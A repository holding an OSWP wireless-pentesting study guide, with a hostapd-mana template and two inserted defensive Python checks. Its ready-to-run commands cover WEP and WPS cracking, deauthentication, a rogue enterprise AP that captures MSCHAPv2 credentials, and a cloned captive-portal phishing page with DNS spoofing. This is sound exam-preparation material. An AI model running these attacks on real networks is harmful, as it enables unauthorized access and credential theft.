├── LICENSE
├── README.md
└── hostapd-mana.conf

/LICENSE:
--------------------------------------------------------------------------------
MIT License

Copyright (c) 2023 FullSteeI

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# OSWP-Study-Guide
Study guide and command sheet for the Offensive Security PEN-210 course (Offensive Security Wireless Pentester - OSWP)

## Dependencies
In order to run the following commands, install these packages first (the `aircrack-ng` package provides airmon-ng, airodump-ng, aireplay-ng, besside-ng and aircrack-ng):
```bash
sudo apt install aircrack-ng reaver hashcat hostapd hostapd-mana asleap macchanger dnsmasq nftables apache2 libapache2-mod-php freeradius
```

## Open Network with MAC filtering
If fake authentication keeps failing, the AP is probably using MAC address filtering: it only accepts connections from a predefined list of MAC addresses. In that case, find a legitimate client MAC address by monitoring the network with airodump-ng, then spoof that address once the corresponding client has disconnected. Do not run a fake authentication attack with a client's MAC address while that client is still active on the AP.

### Packet capture
```bash
airodump-ng -w <prefix> -c <channel> --bssid <BSSID> <interface>
```
### Get your MAC address
```bash
macchanger --show <interface>
```

### Fake authentication attack
```bash
aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <your MAC> <interface>
```

### ARP replay attack
```bash
aireplay-ng -3 -b <BSSID> -h <your MAC> <interface>
```

### Deauthentication attack
```bash
aireplay-ng -0 1 -a <BSSID> -c <client MAC> <interface>
```

### Crack
```bash
aircrack-ng <capture>.cap
```

## WEP (Wired Equivalent Privacy)
WEP is a severely flawed security algorithm for IEEE 802.11 wireless networks.
Below are the steps to exploit WEP vulnerabilities:

### Step 1: Kill conflicting processes
```bash
sudo airmon-ng check kill
```
### Step 2: Start monitor mode on wlan0
```bash
sudo airmon-ng start wlan0
```
### Step 3: Scan for WEP networks
```bash
sudo airodump-ng wlan0mon --encrypt WEP
```
### Step 4: Capture IVs
```bash
besside-ng -c <channel> -b <BSSID> wlan0mon
```
### Step 5: Crack WEP key
```bash
aircrack-ng ./wep.cap
```

### Additional WEP Attacks:
- [Hirte Attack](https://pentestlab.blog/2015/02/03/hirte-attack/)
- [Caffe Latte Attack](https://www.computerworld.com/article/2539400/cafe-latte-attack-steals-data-from-wi-fi-users.html)

## WPS (Wi-Fi Protected Setup)
WPS was originally known as Wi-Fi Simple Configuration, aiming to unify vendor technologies for secure WPA/WPA2 passphrase sharing. However, it has its own set of vulnerabilities. Below are the steps to identify and exploit WPS vulnerabilities:

### Identifying access points with WPS enabled
```bash
wash -i <interface> -s
```
### Fake authentication attack
```bash
aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <your MAC> <interface>
```
### Offline brute force (pixie dust)
```bash
reaver -i wlan0 -b <BSSID> -SNLAvv -c 1 -K
```
### Online brute force
```bash
reaver -i <interface> -b <BSSID> -SNLAsvv -d 1 -r 5:3 -c <channel>
```

## WPA/WPA2/WPA3 Testing
Steps for testing security on networks with WPA/WPA2/WPA3 encryption, including setting up rogue APs and capturing handshakes:

## WPA2 Enterprise
Follow these steps to set up wireless monitoring and perform the attack.

### Step 1: Activate monitoring mode

```bash
airmon-ng check kill && airmon-ng start <interface>
```

### Step 2: Check AUTH column

```bash
airodump-ng <interface>
```
*Note: for enterprise (802.1X) networks the AUTH column shows MGT.*

### Step 3: Capture the handshake

```bash
sudo airodump-ng -c <channel> -w <ESSID> <interface>
```

### Step 4: Deauthenticate the client to capture the handshake

```bash
aireplay-ng -0 0 -a <BSSID> -c <client MAC> <interface>
```

### Step 5: Analyze with Wireshark or tshark

After gathering the BSSID, ESSID, and channel, use Wireshark or tshark with these display filters:
```bash
wlan.bssid==E8:9C:12:02:66:AA && eap && tls.handshake.certificate
```
or
```bash
tls.handshake.type == 11,3
```

### Step 6: Save certificates using OpenSSL

View the Packet Details in TLSv1 Record Layer >> Handshake Protocol >> Certificate, save the certificate bytes to `cert.der`, then inspect it:

```bash
openssl x509 -inform der -in cert.der -text
```

*Details needed for the attack include: Issuer information.*

### Step 6.5 (Optional): Convert the certificate to PEM format

```bash
openssl x509 -inform der -in cert.der -outform pem -out output.crt
```

### Step 7: Set up FreeRADIUS server

Install with:

```bash
sudo apt install freeradius
```

Edit the `ca.cnf` and `server.cnf` files to have less suspicious certificate authority fields.

```bash
sudo mousepad /etc/freeradius/3.0/certs/ca.cnf
sudo mousepad /etc/freeradius/3.0/certs/server.cnf
```

Update the respective sections with the correct information (the issuer details noted in Step 6).

### Step 8: Prepare the certificates

Navigate to `/etc/freeradius/3.0/certs/` and run:

```bash
sudo rm dh && make
```

*Note: Ignore the error from FreeRADIUS if it expects other configurations.*

### Step 9: Configure hostapd-mana

Edit `/etc/hostapd-mana/mana.conf` with the correct SSID, certificate paths, and EAP user file.

### Step 10: Set up `mana.eap_user`

Configure `/etc/hostapd-mana/mana.eap_user` with the desired protocols and authentication methods.

### Step 11: Start hostapd-mana

```bash
hostapd-mana /etc/hostapd-mana/mana.conf
```

### Step 12: Use asleap to find a user

Run asleap with the captured challenge and response to find a user with a successful login:

```bash
asleap -C <challenge> -R <response> -W /usr/share/john/password.lst
```

### Step 13: Create `wpa_supplicant.conf` file

Add the network configuration details:

```bash
network={
    ssid="NetworkName"
    scan_ssid=1
    key_mgmt=WPA-EAP
    identity="Domain\\username"
    password="password"
    eap=PEAP
    phase1="peaplabel=0"
    phase2="auth=MSCHAPV2"
}
```

### Step 14: Connect to the network

Use `wpa_supplicant` to connect:

```bash
wpa_supplicant -i <interface> -c wpa_supplicant.conf
```


## Rogue Access Points
Instructions for creating a rogue AP.
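The client side of the enterprise attack in Steps 9 to 14: the `wpa_supplicant.conf` profile in Step 13 has no `ca_cert` and no `domain_suffix_match`, so it completes the PEAP tunnel with whatever RADIUS server answers, which is exactly what a rogue enterprise AP relies on. As an added example that is not part of the guide, this Python script parses such `network={}` blocks and reports the missing server-certificate checks; the hardened profile, its CA path and the RADIUS hostname are assumptions.

```python
import re

# Constructed inputs. WEAK_CONF is the PEAP/MSCHAPv2 profile from Step 13 as written;
# HARDENED_CONF is an assumed fixed version (CA path and RADIUS hostname are placeholders).
WEAK_CONF = r'''
network={
    ssid="NetworkName"
    scan_ssid=1
    key_mgmt=WPA-EAP
    identity="Domain\\username"
    password="password"
    eap=PEAP
    phase1="peaplabel=0"
    phase2="auth=MSCHAPV2"
}
'''
HARDENED_CONF = r'''
network={
    ssid="NetworkName"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="Domain\\username"
    password="password"
    phase2="auth=MSCHAPV2"
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    domain_suffix_match="radius.example.com"
}
'''

_NETWORK_BLOCK = re.compile(r"network\s*=\s*\{(.*?)\}", re.S)
# wpa_supplicant fields that bind the server certificate to an expected server name.
NAME_MATCH_KEYS = ("domain_suffix_match", "domain_match", "altsubject_match", "subject_match")


def parse_network_blocks(text):
    """Return one dict per network={...} block; quotes around values are stripped."""
    blocks = []
    for body in _NETWORK_BLOCK.findall(text):
        entries = {}
        for line in body.splitlines():
            line = line.split("#", 1)[0].strip()  # drop comments and blank lines
            if "=" in line:
                key, value = line.split("=", 1)
                entries[key.strip()] = value.strip().strip('"')
        blocks.append(entries)
    return blocks


def audit_eap_block(net):
    """List what lets a rogue RADIUS/hostapd-mana AP harvest this profile's credentials."""
    findings = []
    if "WPA-EAP" not in net.get("key_mgmt", ""):
        return findings  # PSK or open profile: server-certificate checks do not apply
    if not net.get("ca_cert"):
        findings.append("no ca_cert: any server certificate completes the TLS tunnel")
        if "MSCHAPV2" in net.get("phase2", "").upper():
            findings.append("MSCHAPv2 challenge/response then reaches the rogue server and can be cracked offline")
    if not any(net.get(k) for k in NAME_MATCH_KEYS):
        findings.append("no domain_suffix_match/domain_match: any certificate from the trusted CA is accepted")
    return findings
```

Run `audit_eap_block` over every block returned by `parse_network_blocks`; an empty list means the profile pins both the CA and the server name.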

### Discovery
```bash
sudo airodump-ng -w capturename --output-format pcap wlan0mon
```
**Wireshark Filters:**
```bash
wlan.fc.type_subtype == 0x08   # beacon frames (broadcast)
wlan.ssid == "apname"          # AP name
```
Filters can be combined to show only beacon frames from a specific AP:
```bash
wlan.fc.type_subtype == 0x08 && wlan.ssid == "apname"
```
The interesting parts are in Tag: Vendor Specific and Tag: RSN Information.

### Creating a Rogue AP
Hostapd-mana template location:
```bash
/etc/hostapd-mana/hostapd-mana.conf
```
Or you may download the `hostapd-mana.conf` in this repository and modify it to your needs.

Start hostapd-mana:
```bash
sudo hostapd-mana hostapd-mana.conf
```

### Cracking .hccapx Files
**aircrack:**
```bash
aircrack-ng name.hccapx -w /wordlist/rockyou.txt
```
If you run into errors, you may try:
```bash
aircrack-ng name.hccapx -e ESSID -w /wordlist/rockyou.txt
```
**hashcat:**
```bash
hashcat -m 2500 capture.hccapx /usr/share/wordlists/rockyou.txt
```

## Attacking Captive Portals

This guide provides step-by-step instructions for setting up a wireless network monitoring and attack environment.

### 1. Set Interface to Monitor Mode

Begin by capturing information about clients and access points (APs) around you:

```bash
sudo airodump-ng wlan0mon
```

### 2. Adjust the Capture

To specify the capture details, use:

```bash
sudo airodump-ng -w fileName --output-format pcap -c channelnumber interface
```

### 3. De-authenticate Connected Devices

Wait until the WPA handshake is captured:

```bash
sudo aireplay-ng -0 amountOfdeauths -a ApBSSID interface
```

### 4. Disable Monitor Mode

After completing the capture, disable monitor mode and install the web server for the portal:

```bash
sudo airmon-ng stop wlan0mon
sudo apt install apache2 libapache2-mod-php
```

### 5. Download the Example Page

Use `wget` to download the webpage. Here, `-l2` means to go 2 levels deep:

```bash
wget -r -l2 https://www.website.com
```

### 6. Prepare the Web Directory

Create a directory for the phishing webpage:

```bash
sudo mkdir /var/www/html/portal && sudo mousepad /var/www/html/portal/index.php
```

### 7. Replicate the Website's Style

Replicate the styling of the example website page and copy the assets:

```bash
sudo cp -r ./www.website.com/assets /var/www/html/portal
```

### 8. Set Up the Login Page

Configure the login page to redirect to `login_check.php`:

```bash
sudo mousepad /var/www/html/portal/login_check.php
```

### 9. Assign an IP address and activate the interface:

```bash
sudo ip addr add 192.168.87.1/24 dev wlan0
sudo ip link set wlan0 up
```

### 10. Ensure dnsmasq is installed:

```bash
sudo apt install dnsmasq
```

### 11. Create the DHCP config file at `/home/kali/dnsmasq.conf` and add spoofing entries for top-level domains:

```bash
address=/com/192.168.0.1
address=/org/192.168.0.1
address=/net/192.168.0.1
```

### 12. For Windows 7 & 10 captive portal detection, add:

```bash
address=/dns.msftncsi.com/131.107.255.255
```

### 13. Start dnsmasq with the config file:

```bash
sudo dnsmasq --conf-file=/home/kali/dnsmasq.conf
```

### 14. Verify if dnsmasq is running successfully:

```bash
sudo tail /var/log/syslog | grep dnsmasq
```

### 15. Install nftables:

```bash
sudo apt install nftables
```

### 16. Add required rules:

```bash
sudo nft add table ip nat
sudo nft 'add chain ip nat PREROUTING { type nat hook prerouting priority dstnat; policy accept; }'
sudo nft add rule ip nat PREROUTING iifname "wlan0" udp dport 53 counter redirect to :53
```

### 17. Modify Apache configuration:

```bash
sudo mousepad /etc/apache2/sites-enabled/000-default.conf
```

### 18. Enable necessary modules and restart Apache:

```bash
sudo a2enmod rewrite && sudo a2enmod alias
sudo systemctl restart apache2
```

### 19. Check the portal by navigating to:

```bash
firefox http://127.0.0.1/portal/index.php
```

### 20. Install hostapd and edit the configuration:

```bash
sudo apt install hostapd && mousepad hostapd.conf
```

### 21. Create and run an 802.11n AP:

```bash
sudo hostapd -B hostapd.conf
```

### 22. Monitor the logs in two separate terminals:

- Terminal 1:

```bash
sudo tail -f /var/log/syslog | grep -E '(dnsmasq|hostapd)'
```

- Terminal 2:

```bash
sudo tail -f /var/log/apache2/access.log
```

### 23. Search for passphrase files in `/tmp/`:

```bash
sudo find /tmp/ -iname passphrase.txt
```

### 24. Read the contents of the passphrase file:

```bash
sudo cat /tmp/systemd-private-b37…aef-apache2.service-b...i/tmp/passphrase.txt
```


## Information Discovery Example
- ESSID of JesusIsTheWay
- BSSID of 34:5a:90:e0:5a:30
- WPS (AES/CCM)
- Uses a PSK
- Runs on channel 1

## Definitions
- AP: Access Point
- BSSID: Basic Service Set Identifier, a 48-bit number that follows MAC address conventions.
- ESSID: Extended Service Set Identifier, the network name (a unique identifier) that distinguishes one wireless network from others nearby.

## Troubleshooting
- Make sure that hostapd-mana is installed on Kali. Default installations currently feature hostapd, hostapd-wpe and hostapd_cli. None of these feature the *mana_wpaout* option used in *hostapd-mana.conf*, and using them will result in the error: *unknown configuration item 'mana_wpaout'*
- When starting the exam, the first thing after connecting to the .ovpn is to test both **SSH** and **RDP** protocols to ensure the connection works as intended.
- In order to list wireless interfaces, execute the command:
```bash
sudo airmon-ng
```
- To restart Network Manager, execute the command:
```bash
systemctl restart NetworkManager.service
```

## Sources
- [LIODEUS OSWP Cheatsheet](https://liodeus.github.io/2020/10/29/OSWP-personal-cheatsheet.html)
- [Hashcat File Formats](https://hashcat.net/wiki/doku.php?id=example_hashes)
- [Hashcat Cracking WPA/WPA2](https://hashcat.net/wiki/doku.php?id=cracking_wpawpa2)

## Disclaimer and Legal Notice

### Ethical Considerations and Legal Compliance
The techniques, commands, and procedures outlined in this guide are intended solely for educational purposes and preparing for the Offensive Security PEN-210 course (Offensive Security Wireless Pentester - OSWP).
These techniques involve methodologies that, if misused, may constitute illegal activities. Users are strongly cautioned against engaging in any unauthorized and/or unlawful actions.

### Scope of Use
- **Authorized Environments Only**: The execution of penetration testing, network attacks, and other tactics described herein should only be performed on networks and systems that are explicitly owned or authorized for testing by the user. This includes personal hardware, controlled environments, or environments for which explicit, documented permission has been granted.
- **No Unauthorized Use**: Under no circumstances should these techniques be applied to networks, systems, or devices without explicit authorization. Unauthorized use of these techniques may lead to legal consequences and is strongly condemned.

### Exam Conduct
- **Adherence to Exam Guidelines**: While this guide serves as preparation material for the OSWP exam, users must strictly adhere to the guidelines, rules, and ethical standards set forth by Offensive Security during the examination.
- **Prohibited Actions**: Any attempt to use these techniques outside of the specified exam environment, or in a manner not aligned with the exam's rules, may result in disqualification, legal action, and other serious consequences.

### Liability
- **No Responsibility for Misuse**: The authors, contributors, and associated entities of this guide accept no responsibility or liability for any misuse, damage, or illegal activities arising from the information presented. Users are solely responsible for their actions.
- **Acknowledgment of Risk**: Users acknowledge the risks involved in security testing and penetration testing and agree to ensure ethical and legal use of this information.

### Continuous Learning and Ethical Growth
- **Commitment to Ethical Hacking**: Users are encouraged to pursue knowledge in cybersecurity and ethical hacking with a strong commitment to legal compliance, ethical behavior, and respect for privacy and data protection.

By using the information in this guide, you acknowledge having read, understood, and agreed to this disclaimer and all its terms. Your use of this information indicates your acceptance of the risks and your commitment to using this knowledge responsibly and ethically.
--------------------------------------------------------------------------------
/hostapd-mana.conf:
--------------------------------------------------------------------------------
# Template config file for the hostapd-mana command.
# hostapd does not strip trailing comments from a value line, so every comment sits on its own line.
interface=wlan0
ssid=apname
channel=1
ieee80211n=1
# hw_mode: g for 2.4 GHz; if 5 GHz, set to a
hw_mode=g
# wpa: 1 only enables WPA, 2 is WPA2, 3 enables both
wpa=3
wpa_key_mgmt=WPA-PSK
# actual value irrelevant, as we are only trying to capture the handshake; has to be between 8 and 63 characters
wpa_passphrase=ANYPASSWORD
# WPA only
wpa_pairwise=TKIP CCMP
# WPA2 only; since we use option 3, we enable both
rsn_pairwise=TKIP CCMP
# specifies where to save handshakes; each handshake is appended to the file and can be cracked with hashcat -m 2500 or aircrack-ng
mana_wpaout=/home/kali/name.hccapx
# if mana_wpaout produces the error "unknown configuration item 'mana_wpaout'", make sure you are using the hostapd-mana command and not hostapd
--------------------------------------------------------------------------------
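As an added example that is not part of the guide or its repository, here is the defender's view of the rogue AP the template above creates: a Python check that compares observed beacon summaries (the ESSID, BSSID, channel and security fields the Discovery section and the Information Discovery Example collect) against an allow-list, and flags a second BSSID advertising a known ESSID, a change in the advertised security, or a cloned BSSID. The observations are constructed; the rogue row mirrors the template's wpa=3 TKIP CCMP settings.

```python
# Allow-list built from the "Information Discovery Example" above: what each managed
# ESSID should look like (BSSID, channel, security as shown by airodump-ng / the RSN tag).
KNOWN_APS = {
    "JesusIsTheWay": {"bssid": "34:5a:90:e0:5a:30", "channel": 1, "privacy": "WPA2 CCMP PSK"},
}

# Constructed beacon summaries, not a real capture. The second row is how the
# hostapd-mana template (wpa=3, TKIP CCMP) shows up when it spoofs the same ESSID.
OBSERVED_BEACONS = [
    {"bssid": "34:5a:90:e0:5a:30", "essid": "JesusIsTheWay", "channel": 1, "privacy": "WPA2 CCMP PSK"},
    {"bssid": "02:11:22:33:44:55", "essid": "JesusIsTheWay", "channel": 1, "privacy": "WPA TKIP CCMP PSK"},
    {"bssid": "a4:2b:8c:11:22:33", "essid": "OtherNet", "channel": 6, "privacy": "WPA2 CCMP PSK"},
]


def is_locally_administered(bssid):
    """True when bit 1 of the first octet is set: the address was assigned locally rather
    than by a vendor, a common (not conclusive) sign of a changed MAC."""
    return bool(int(bssid.split(":")[0], 16) & 0x02)


def find_rogue_aps(beacons, known):
    """Return one alert per beacon that contradicts the allow-list entry for its ESSID.
    A known BSSID advertising different security (a cloned AP) is reported too."""
    alerts = []
    for b in beacons:
        base = known.get(b["essid"])
        if base is None:
            continue  # an ESSID we do not manage: nothing to compare against
        reasons = []
        if b["bssid"].lower() != base["bssid"].lower():
            reasons.append("BSSID not in the allow-list for this ESSID")
            if is_locally_administered(b["bssid"]):
                reasons.append("locally administered BSSID")
        if b["privacy"] != base["privacy"]:
            reasons.append(f"security changed: {b['privacy']} (expected {base['privacy']})")
        if b["channel"] != base["channel"]:
            reasons.append(f"channel changed: {b['channel']} (expected {base['channel']})")
        if reasons:
            alerts.append({"essid": b["essid"], "bssid": b["bssid"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in find_rogue_aps(OBSERVED_BEACONS, KNOWN_APS):
        print(alert["essid"], alert["bssid"], "; ".join(alert["reasons"]))
```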